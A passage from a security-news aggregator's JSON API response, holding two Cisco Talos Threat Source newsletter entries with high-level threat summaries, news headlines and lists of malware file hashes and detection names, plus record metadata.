the job, and perfection is a myth.&#xA0; The one big thing&#xA0;Cisco Talos&#x2019; latest findings on the China-nexus threat actor UAT-7810 shows they are expanding their Operational Relay Box (ORB) networks with a fresh suite of custom malware. The group exploits known vulnerabilities in unpatched Ruckus and ASUS routers to deploy new tools, including the upgraded \"LONGLEASH\" and \"DOGLEASH\" backdoors. UAT-7810 builds these covert networks to provide infrastructure for other APT groups to launch attacks against high-value targets.&#xA0; Why do I care?&#xA0;ORB networks create a massive blind spot. They allow secondary threat actors to mask their origins and route malicious traffic through seemingly innocuous nodes. By compromising edge devices like wireless routers, UAT-7810 builds a highly evasive, decentralized proxy network that easily bypasses traditional perimeter defenses. The active development of sophisticated, multi-platform tools like LONGLEASH shows this group is heavily investing in making their infrastructure incredibly resilient and hard to dismantle.&#xA0; So now what?&#xA0;Because UAT-7810 relies on exploiting n-day vulnerabilities, defenders must ensure all edge devices, particularly Ruckus and ASUS routers, are fully patched. Monitor network traffic for unusual proxying behavior or unauthorized connections on devices that typically lack complex services. The blog post has a complete list of IOCs to help detect and block this malware suite.&#xA0; Top security headlines of the week&#xA0;The &#x201C;first&#x201D; AI-run ransomware attack still needed a human&#xA0; Researchers at cloud security firm Sysdig said they&#x2019;d documented the first known case of &#x201C;agentic ransomware.&#x201D; (The encryption was non-reversible &#x2014;&#xA0;essentially a wiper, not ransomware.) A human provided compromised credentials, provisioned the command-and-control server, the staging server used for the stolen data, chose a victim, and more. (TechCrunch)&#xA0; AirDrop and Quick Share flaws let nearby attackers trigger crashes and bypass checks &#xA0; Two researchers have found six security flaws in&#xA0;AirDrop&#xA0;and&#xA0;Quick Share. An attacker within wireless range, with just a laptop and no prior connection, can crash the sharing service on a Mac or iPhone set to receive from anyone, with no tap or prompt. (The Hacker News)&#xA0; Hidden backdoor in Tenda router firmware grants admin access&#xA0; A hidden authentication backdoor has been found in multiple Tenda router firmware versions, potentially allowing an attacker to gain administrative access to the device&apos;s web management panel. According to the CERT Coordination Center, the issue remains unfixed because the maker couldn&apos;t be reached. (BleepingComputer)&#xA0; State IDs for AI agents: Will Estonia set a precedent?&#xA0; Estonia&apos;s government will soon assign official government ID numbers to AI agents. The point is to enable organizations and individuals to use AI when engaging government systems, but in a way that&apos;s limited and auditable. (Dark Reading)&#xA0; Can&#x2019;t get enough Talos?&#xA0;Space pirates, Living Off Trusted Services, and Bill declares food war &#xA0; The team discusses how Living Off Trusted Services (LOTS) differs from Living Off the Land (LOTL) (and Lord of the Rings (LOTR]), why trusted services create new detection challenges, and what defenders should be monitoring.&#xA0; ARToken: Inside an EvilTokens affiliate panel targeting Microsoft 365&#xA0; Talos has identified \"ARToken,\" a phishing-as-a-service platform that targets Microsoft 365. The ARToken panel exposes 80+ API endpoints for device code phishing, Primary Refresh Token persistence, email access, BEC operations, and SharePoint exfiltration.&#xA0; Martin Lee: Running through the Arctic (and the threat landscape)&#xA0; Ever wonder how someone goes from studying human viruses to leading cybersecurity teams? How about running through the Arctic for fun? &#xA0;In this Humans of Talos you get to hear from Martin and&#xA0;that&#x2019;s&#xA0;ALWAYS worth pulling up a seat.&#xA0; Upcoming events where you can find Talos&#xA0;Black Hat USA (Aug. 1 &#x2013; 6) Las Vegas, NV&#xA0;DEF CON 34 (Aug. 6 &#x2013; 9) Las Vegas, NV&#xA0;Most prevalent malware files from Talos telemetry over the past week&#xA0;SHA256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507 &#xA0; MD5: 2915b3f8b703eb744fc54c81f4a9c67f&#xA0; Talos Rep: https://talosintelligence.com/talos_file_reputation?s=9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507&#xA0; Example Filename: VID001.exe&#xA0; Detection Name: Win.Worm.Coinminer::1201**&#xA0; SHA256: 621c6d42409e8aa423684827b4375a35684c71c600f2dd9101f235e8ec633488&#xA0; MD5: 9b512ba139304c247ddd3d2c4b9179fd&#xA0; Talos Rep: https://talosintelligence.com/talos_file_reputation?s=621c6d42409e8aa423684827b4375a35684c71c600f2dd9101f235e8ec633488&#xA0; Example Filename: 9b512ba139304c247ddd3d2c4b9179fd.exe&#xA0; Detection Name: W32.HEUR:Attribute.28iy.1201&#xA0; SHA256: 9896a6fcb9bb5ac1ec5297b4a65be3f647589adf7c37b45f3f7466decd6a4a7f&#xA0; MD5: 38de5b216c33833af710e88f7f64fc98&#xA0; Talos Rep: https://talosintelligence.com/talos_file_reputation?s=9896a6fcb9bb5ac1ec5297b4a65be3f647589adf7c37b45f3f7466decd6a4a7f&#xA0; Example Filename: SECOH-QAD.exe &#xA0; Detection Name: Win.Tool.Procpatcher::1201&#xA0; SHA256: afc8a00883a4ea07df2dc1d4ed02f8a23b35c9456413b438a2d9ce3ae5076638&#xA0; MD5: cc4d231df34e57f59eb970353c7d9de2&#xA0; Talos Rep: https://talosintelligence.com/talos_file_reputation?s=afc8a00883a4ea07df2dc1d4ed02f8a23b35c9456413b438a2d9ce3ae5076638&#xA0; Example Filename: sample.exe&#xA0; Detection Name: PUA.Win.Tool.Kmsactivator::1201&#xA0;","cveId":null,"cvssScore":null,"cvssVector":null,"severity":"unknown","vendor":null,"product":null,"affectedVersions":[],"cwes":[],"tags":["talos","threat-research","cisco","threat-source-newsletter","geo:inferred"],"relatedCves":[],"titleFingerprint":null,"countryCodes":["CN","EE","US"],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://blog.talosintelligence.com/winning-54-of-the-time/","type":"report","title":"Cisco Talos: Winning 54% of the time"}],"epssScore":null,"epssPercentile":null,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-07-09T18:00:06.000Z","addedAt":"2026-07-29T20:53:06.708Z","updatedAt":"2026-07-29T20:53:06.708Z","epssUpdatedAt":null,"nucleiUpdatedAt":null,"links":[]},{"id":"bc52e825-b5df-4e46-8cd7-04c4f2171e4d","slug":"talos-catan-and-mouse-5234b185","externalId":"6a45614e90dd380001fb081d","source":"Cisco Talos","sourceType":"vendor-rss","type":"security-news","title":"Catan and Mouse","description":"Welcome to this week&#x2019;s edition of the Threat Source newsletter.&#xA0;&#xA0; &#x201C;I do not know everything; still many things I understand.&#x201D; &#x2015; Madeleine L&apos;Engle, A Wrinkle in Time&#xA0;&#x201C;Don&apos;t try to&#xA0;comprehend with&#xA0;your mind. Your&#xA0;minds are&#xA0;very limited. Use your intuition.&#x201D; &#x2015; Madeleine L&apos;Engle, A Wind in the Door&#xA0;The World Cup. The 4th&#xA0;of July as&#xA0;the US turns 250. Dungeon Crawler Carl.&#xA0;LeBron&#xA0;moving&#xA0;on. Wimbledon. AI.&#xA0;There&#xA0;are&#xA0;so many things that I could draw&#xA0;a parallel&#xA0;to&#xA0;farm&#xA0;for this week&#x2019;s newsletter&#xA0;content.&#xA0;So&#xA0;let&#x2019;s&#xA0;talk about board games.&#xA0;&#xA0; &#xA0; A lot of skills come and&#xA0;go,&#xA0;and your journey with cybersecurity will be full of tools that you learn and then are gone.&#xA0;It&#x2019;s&#xA0;a never-ending journey of learning.&#xA0;And&#xA0;it&#x2019;s&#xA0;honestly the best thing about this career path for the kind of minds that are drawn to it.&#xA0;Innate curiosity is the currency of our cyber family.&#xA0;&#xA0; Learning new and&#xA0;interesting board games (and I use the term broadly to circle in RPGs, card games,&#xA0;etc) is an incredible way to hone your mind and keep it&#xA0;focused on some of the most important tools that you will have.&#xA0;&#xA0; Games will harness your ability to highlight anomalous activity, by players, by rulesets, by structure. They will also highlight&#xA0;your&#xA0;personal brand of brain activity and allow you to&#xA0;leverage&#xA0;your singular style and intuition into a weapon.&#xA0;&#xA0; There are countless ways to win&#xA0;Ticket to&#xA0;Ride&#xA0;and your play style may be completely counter to someone you play with.&#xA0;That&#xA0;then&#xA0;creates patterns that you&#xA0;must&#xA0;learn to break. Nothing is more important to your defensive strategies than knowing yourself (know&#xA0;your environment!) and then breaking your tendencies to force your opponent to change their comfortable tactics (maybe, you&#x2019;ve created some honeypot fake accounts to trigger&#xA0;identity alerts to track threat actors, to track their tooling and methodologies quietly).&#xA0;&#xA0; This&#xA0;is&#xA0;nothing compared&#xA0;to&#xA0;the chaotic variance of a game like&#xA0;Go&#xA0;with&#xA0;its&#xA0;simplistic ruleset&#xA0;yet&#xA0;cascading complexity of each stone&#x2019;s placement.&#xA0;&#xA0; &#xA0; Learning a new game is a challenge and a great practice in and of&#xA0;itself, but&#xA0;learning how YOU and your strategies evolve as you learn the game will give you a&#xA0;microcosmic&#xA0;view into taking on new technologies, new coding languages,&#xA0;and&#xA0;new skill sets.&#xA0;&#xA0; You will have peaks and valleys. So&#xA0;often in the work world we let the complexities and our imposter syndrome keep us from taking&#xA0;a&#xA0;risk or next step in our learning evolutions &#x2013; next steps that we boldly take in our gaming lives.&#xA0;&#xA0; So&#xA0;take what you learn from a&#xA0;Machi Koro, or&#xA0;Pathfinder, or&#xA0;Catan, or&#xA0;Wingspan, or&#xA0;ADnD&#xA0;2e, or ... you get the idea, take that same aggressive inquisitive mindset to your current work, turn it on&#xA0;its&#xA0;head and find a new way to do something you are already good at. And then look at something you struggle with and treat it&#xA0;like&#xA0;the next level. In the end, the&#xA0;worst&#xA0;that can happen&#xA0;is&#xA0;you fail. Because&#xA0;that&#x2019;s&#xA0;where&#xA0;we learn.&#xA0;&#xA0; \"If the rule you followed brought you to this, of what use was the rule?\" &#x2013; Cormac McCarthy, No Country for Old Men&#xA0;&#xA0;The one big thing&#xA0;Cisco Talos is highlighting research into&#xA0;ARToken&#xA0;a&#xA0;fully-featured&#xA0;phishing-as-a-service (PhaaS) operator panel, branded \"ARToken,\" that shares infrastructure, API contracts, and operational patterns with the&#xA0;EvilTokens&#xA0;platform documented by&#xA0;Sekoia&#xA0;and Microsoft in early 2026, and features&#xA0;capabilites&#xA0;previously not documented.&#xA0; Why do I care?&#xA0;The&#xA0;ARToken&#xA0;panel exposes 80+ API endpoints for device code phishing, Primary Refresh Token (PRT) persistence, email access, business email compromise (BEC) operations, and SharePoint exfiltration &#x2014; all accessible to operators through a React-based dashboard.&#xA0;These features&#xA0;indicate&#xA0;the platform is more mature than a simple device code phishing kit &#x2014; it is a complete BEC operations environment.&#xA0; So now what?&#xA0;Defenders should be aware of the kind of capabilities that this panel gives and use&#xA0;the&#xA0;IOCs provided by Talos&#xA0;to block&#xA0;malicious&#xA0;activity and use them as pivots for their internal hunts if they are present. Top security headlines of the week&#xA0;An aggressive password-spraying campaign targeting Microsoft 365 environments generated more than 81 million login attempts over a two-week period The threat actor tried to authenticate via Microsoft&apos;s Azure command-line interface (CLI) using still valid username and password combinations that had been exposed in past breaches. (BleepingComputer) Threat actors are trying to&#xA0;leverage&#xA0;organization-owned AI agents to power complex threat activity By exploiting misconfigured or exposed AI endpoints, adversaries are increasingly turning enterprise-grade automation tools against their owners to facilitate more sophisticated and evasive cyberattacks. (DarkReading) A recent authentication bypass vulnerability in the&#xA0;SimpleHelp&#xA0;remote monitoring and management (RMM) software has been exploited for malware&#xA0;delivery Tracked as CVE-2026-48558, the bug&#xA0;impacts&#xA0;SimpleHelp&#x2019;s&#xA0;OpenID Connect authentication flow and allows a remote attacker to obtain a fully authenticated technician session. (Security Week) Can&#x2019;t get enough Talos?&#xA0;Martin Lee: Running through the Arctic (and the threat landscape) Ever wonder how someone goes from studying human viruses to leading cybersecurity teams? How about running through the Arctic for fun? &#xA0;In this Humans of Talos you get to hear from Martin and&#xA0;that&#x2019;s&#xA0;ALWAYS worth pulling up a seat.&#xA0; &#xA0; Beers with Talos&#xA0;has an updated format,&#xA0;which&#xA0;includes making Hazel a&#xA0;hacker&#xA0;and &#x201C;Reasons not to Quit&#x201D;,&#xA0;listener questions (yes, that means&#xA0;YOU)&#xA0;-&#xA0;as well as a guest appearance from Nick Biasini who is always worth the price of&#xA0;admission.&#xA0; Upcoming events where you can find Talos&#xA0;Black Hat USA (Aug. 1 &#x2013; 6) Las Vegas, NV&#xA0;DEF CON 34 (Aug. 6 &#x2013; 9) Las Vegas, NV&#xA0;Most prevalent malware files from Talos telemetry over the past week&#xA0;SHA256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507&#xA0; MD5: 2915b3f8b703eb744fc54c81f4a9c67f&#xA0; Talos Rep:&#xA0;https://talosintelligence.com/talos_file_reputation?s=9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507&#xA0; Example Filename: VID001.exe&#xA0; Detection Name:&#xA0;Win.Worm.Coinminer::1201**&#xA0;&#xA0; SHA256: 9896a6fcb9bb5ac1ec5297b4a65be3f647589adf7c37b45f3f7466decd6a4a7f MD5: 38de5b216c33833af710e88f7f64fc98 Talos Rep:&#xA0;https://talosintelligence.com/talos_file_reputation?s=9896a6fcb9bb5ac1ec5297b4a65be3f647589adf7c37b45f3f7466decd6a4a7f&#xA0; Example Filename: sample.exe&#xA0; Detection Name:&#xA0;Win.Tool.Procpatcher::1201&#xA0;&#xA0; SHA256: afc8a00883a4ea07df2dc1d4ed02f8a23b35c9456413b438a2d9ce3ae5076638 MD5: cc4d231df34e57f59eb970353c7d9de2&#xA0; Talos Rep:&#xA0;https://talosintelligence.com/talos_file_reputation?s=afc8a00883a4ea07df2dc1d4ed02f8a23b35c9456413b438a2d9ce3ae5076638&#xA0; Example Filename: AutoPico.exe&#xA0; Detection Name:&#xA0;PUA.Win.Tool.Kmsactivator::1201&#xA0;&#xA0; SHA256: c0ad494457dcd9e964378760fb6aca86a23622045bca851d8f3ab49ec33978fe MD5: bf9672ec85283fdf002d83662f0b08b7&#xA0; Talos Rep:&#xA0;https://talosintelligence.com/talos_file_reputation?s=c0ad494457dcd9e964378760fb6aca86a23622045bca851d8f3ab49ec33978fe&#xA0; Example Filename: f_000cd7.html Detection Name: W32.C0AD494457-95.SBX.TG&#xA0;&#xA0; SHA256: 853baab97b1f3b03c1ffa55797e87867f5fb7ce33457411f56afd270cb395453 MD5: 41acb30b9d662d48b7b4fc0ac3d4b79f Talos Rep:&#xA0;https://talosintelligence.com/talos_file_reputation?s=853baab97b1f3b03c1ffa55797e87867f5fb7ce33457411f56afd270cb395453&#xA0; Example Filename: SignInfoConsole.exe Detection Name: W32.853BAAB97B.in12.Talos&#xA0;","cveId":null,"cvssScore":null,"cvssVector":null,"severity":"unknown","vendor":null,"product":null,"affectedVersions":[],"cwes":[],"tags":["talos","threat-research","cisco","threat-source-newsletter","geo:inferred"],"relatedCves":["CVE-2026-48558"],"titleFingerprint":null,"countryCodes":["US"],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://blog.talosintelligence.com/catan-and-mouse/","type":"report","title":"Cisco Talos: Catan and Mouse"}],"epssScore":null,"epssPercentile":null,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-07-02T18:00:34.000Z","addedAt":"2026-07-29T20:53:06.726Z","updatedAt":"2026-07-29T20:53:06.726Z","epssUpdatedAt":null,"nucleiUpdatedAt":null,"links":[]}],"pagination":{"page":1,"limit":20,"total":14,"totalPages":1,"hasNext":false,"hasPrev":false}},"meta":{"apiVersion":"v1","requestedAt":"2026-10-08T23:22:06.916Z","durationMs":23,"filters":{"search":null,"severity":[],"type":[],"country":["US"],"tag":[],"cwe":[],"vendor":null,"product":null,"cve":null,"source":[],"days":null,"publishedAfter":null,"publishedBefore":null,"minCvss":null,"maxCvss":null,"minEpss":null,"knownExploited":null,"hasPatch":null,"hasNucleiTemplate":null},"sort":"newest","unknownParams":[],"warnings":[]}}